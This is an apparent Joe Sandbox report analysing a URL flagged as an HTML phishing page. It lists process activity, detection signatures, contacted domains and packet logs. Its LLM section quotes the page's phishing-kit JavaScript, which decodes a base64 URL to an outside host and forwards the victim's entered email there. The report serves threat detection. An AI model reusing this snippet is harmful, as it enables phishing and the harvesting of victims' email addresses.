Edit tour

Windows Analysis Report
https://clinicasanclemente.com/ap/

Overview

General Information

Sample URL:	https://clinicasanclemente.com/ap/
Analysis ID:	1586834
Infos:

Detection

HTMLPhisher

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish10

Performs DNS queries to domains with low reputation

HTML body contains low number of good links

HTML title does not match URL

Classification

Process Tree

System is w10x64

chrome.exe (PID: 4308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2008,i,17832135286452935298,15271712750092276784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clinicasanclemente.com/ap/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_44	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 16:08:09 GMTserver: LiteSpeedvary: User-Agentx-turbo-charged-by: LiteSpeedconnection: close

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: classification engine

Classification label: mal52.phis.troj.win@23/4@26/4

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2008,i,17832135286452935298,15271712750092276784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clinicasanclemente.com/ap/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2008,i,17832135286452935298,15271712750092276784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://clinicasanclemente.com/ap/	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://clinicasanclemente.com/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
google.com	172.217.16.206	true	false	high
www.google.com	142.250.186.164	true	false	high
clinicasanclemente.com	68.65.120.84	true	false	unknown
0nline1.online-mba.xyz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://clinicasanclemente.com/ap/	false		unknown
https://clinicasanclemente.com/favicon.ico	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false
68.65.120.84	clinicasanclemente.com	United States	22612	NAMECHEAP-NETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586834
Start date and time:	2025-01-09 17:07:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://clinicasanclemente.com/ap/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.phis.troj.win@23/4@26/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.74.195, 172.217.18.14, 74.125.71.84, 142.250.185.174, 216.58.206.78, 142.250.186.46, 142.250.184.202, 142.250.185.202, 142.250.185.234, 142.250.185.170, 142.250.184.234, 172.217.16.202, 172.217.16.138, 216.58.206.74, 216.58.206.42, 172.217.18.10, 142.250.186.170, 142.250.186.106, 142.250.181.234, 142.250.185.106, 142.250.185.138, 142.250.186.138, 199.232.214.172, 192.229.221.95, 142.250.185.110, 142.250.185.206, 142.250.184.206, 172.217.16.206, 142.250.185.67, 142.250.186.174, 184.28.90.27, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://clinicasanclemente.com/ap/

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: https://clinicasanclemente.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://clinicasanclemente.com
URL: https://clinicasanclemente.com/ap/... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script demonstrates moderate-risk behaviors, including external data transmission and potential redirection to a suspicious domain. While the script appears to have a legitimate purpose of validating an email address and redirecting the user, the use of a base64-encoded URL and lack of transparency around the destination domain raise some concerns. Further review may be necessary to determine the script's true intent." }
document.getElementById('continue-button').addEventListener('click', function() { continueLoading(); }); document.getElementById('thesupwillsup-input').addEventListener('keydown', function(event) { if (event.key === 'Enter') { continueLoading(); } }); function continueLoading() { var thesupwillsup = document.getElementById('thesupwillsup-input').value; if (validateEmail(thesupwillsup)) { var linkx = "aHR0cHM6Ly8wbmxpbmUxLm9ubGluZS1tYmEueHl6Lz91c2VybmFtZT0"; //PUT YOUR LINK HERE var decodedLink = atob(linkx); var finalLink = decodedLink + "" + thesupwillsup; // appender window.location.href = finalLink; } else { alert("Please enter a valid email address."); } } function validateEmail(email) { var re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/; return re.test(email); }
URL: https://clinicasanclemente.com/ap/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "We need verify the intended recipient's email to continue reading in word document. Please enter the email address to which document was shared.", "prominent_button_name": "Open in Word Document", "text_input_field_labels": ["x6213h@sime.org"], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://clinicasanclemente.com/ap/ Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 43

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.452819531114783
Encrypted:	false
SSDEEP:	3:Has6Ln:6sCn
MD5:	CD598D2DCE38CFBA2981425AFD8CC5FF
SHA1:	56C8577B18B89C77A6AC58B925F8ECAB11BEF02C
SHA-256:	64BC0BCC655408713CCC3195B859007631C335758AAC8575658AC138509233E8
SHA-512:	61797961E4747CA9CD7B3E6746E5243F7D9EF59B21B27911E974CEB68460C71ED438FEAAE6C7E1BC77A50E687D63A26623DB0AC1204DEAC60D094EFD0271C6FA
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnWm0MRbjt0xBIFDa8aOOA=?alt=proto
Preview:	CgkKBw2vGjjgGgA=

Chrome Cache Entry: 44

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (64968), with CRLF line terminators
Category:	downloaded
Size (bytes):	353536
Entropy (8bit):	6.031117862766441
Encrypted:	false
SSDEEP:	6144:SODDORezIlikECAtwafzsCNU1W9gor53/OR7uxc6RrA8EvhIajS4qbVw7TvoN:SKORVmptw6sCGA9gsJ/OR7VRWeSpRJN
MD5:	2D035C5D226CC83EE6D98FA46E76DAE4
SHA1:	7D83647F3AEF744D6AA6F201AA04242F6671F9EE
SHA-256:	1FFF84BD0F1C927C3D92CFA8A6DD033CDE24062A29F22255204D94742AB858C1
SHA-512:	71ECA620E6C8ACF157EC96C49275138F1A4A3E4957AFDEA7BEA8865DE7316F045A7E3516BD24E54C10F2082EC9AF7951C2D17A1DA7FE75A01B1ADB959C59D9ED
Malicious:	false
Reputation:	low
URL:	https://clinicasanclemente.com/ap/
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>**---*</title>.. <style>.. body {.. font-family: "Segoe UI", "Segoe UI Web (West European)", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif;.. background-color: #f4f4f4;.. margin: 0;.. display: flex;.. justify-content: center;.. align-items: center;.. height: 100vh;.. color: #333;.. background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABioAAALkCAYAAACRC231AAAgAElEQVR4Xuy9S8ttzbImdNa3T/0WL4ggNgQbNuzYsWPHI0qBKIJYIGhDBBvasKEdQbCj5aVU1EIoCrRQERVRwQIvUKKoICL+Dc/e25kZ8UQ8T2RkjjHnu9ba33rXfPf+1hwjR17iHpER4/Llr/t7//zv/+jw92Vcm//kQTnNy6Prl7g6x9GZz7A2Sp864ATc6VqDVYdot7a17fEwFL9YD+9mx972Ksw+bsLp/+SxNz0u/J4Q4es2/HEd6584q+gJf3fg08xYylf0UwJmhdGAEZAeJ3sQl9USrKPEfpD4u+HM5yofxvr4y0OT9UUHitCpjjUATDo

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 17:08:01.990148067 CET	49675	443	192.168.2.4	173.222.162.32
Jan 9, 2025 17:08:06.562278986 CET	49738	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:08:06.562304974 CET	443	49738	142.250.186.164	192.168.2.4
Jan 9, 2025 17:08:06.562432051 CET	49738	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:08:06.562809944 CET	49738	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:08:06.562824965 CET	443	49738	142.250.186.164	192.168.2.4
Jan 9, 2025 17:08:07.280939102 CET	443	49738	142.250.186.164	192.168.2.4
Jan 9, 2025 17:08:07.281542063 CET	49738	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:08:07.281573057 CET	443	49738	142.250.186.164	192.168.2.4
Jan 9, 2025 17:08:07.282584906 CET	443	49738	142.250.186.164	192.168.2.4
Jan 9, 2025 17:08:07.282660961 CET	49738	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:08:07.283878088 CET	49738	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:08:07.283943892 CET	443	49738	142.250.186.164	192.168.2.4
Jan 9, 2025 17:08:07.334285975 CET	49738	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:08:07.334312916 CET	443	49738	142.250.186.164	192.168.2.4
Jan 9, 2025 17:08:07.381283998 CET	49738	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:08:07.901191950 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:07.901233912 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:07.901304007 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:07.901818037 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:07.901865959 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:07.901916027 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:07.902080059 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:07.902095079 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:07.902331114 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:07.902344942 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.639734030 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.640258074 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:08.640271902 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.640532017 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.640717030 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:08.640734911 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.641163111 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.641213894 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:08.641585112 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.641642094 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:08.647429943 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:08.647489071 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.649385929 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:08.649440050 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.649827003 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:08.649836063 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.694689035 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:08.694698095 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:08.694761038 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:08.740703106 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.122041941 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.122107029 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.122128963 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.122170925 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.122167110 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.122198105 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.122200966 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.122210026 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.122220039 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.122243881 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.122252941 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.142728090 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.142797947 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.142808914 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.142827034 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.142858982 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.188290119 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.212227106 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.212260962 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.212291956 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.212304115 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.212346077 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.233186960 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.233237982 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.233254910 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.233261108 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.233300924 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.234925032 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.234970093 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.234978914 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.234997988 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.235038996 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.236890078 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.236932039 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.236938953 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.236954927 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.236988068 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.237018108 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.302742958 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.302778959 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.302824974 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.302845001 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.302870989 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.302894115 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.323184013 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.323213100 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.323287964 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.323297024 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.323337078 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.324081898 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.324103117 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.324151993 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.324157000 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.324187040 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.325064898 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.325086117 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.325129986 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.325134039 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.325169086 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.326639891 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.326658964 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.326692104 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.326697111 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.326739073 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.327630997 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.327672005 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.327707052 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.327717066 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.327739000 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.327754974 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.357780933 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.357801914 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.357872963 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.357887983 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.358226061 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.393507004 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.393537045 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.393716097 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.393734932 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.393773079 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.394071102 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.394093037 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.394140959 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.394145966 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.394220114 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.425457001 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.425499916 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.425523043 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.425539970 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.425570965 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.425904989 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.425921917 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.425955057 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.425961018 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.425987005 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.426006079 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.426234961 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.426249027 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.426290989 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.426295042 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.426322937 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.426338911 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.426604986 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.426628113 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.426675081 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.426678896 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.426707983 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.431947947 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.431965113 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.432015896 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.432020903 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.432065010 CET	49740	443	192.168.2.4	68.65.120.84
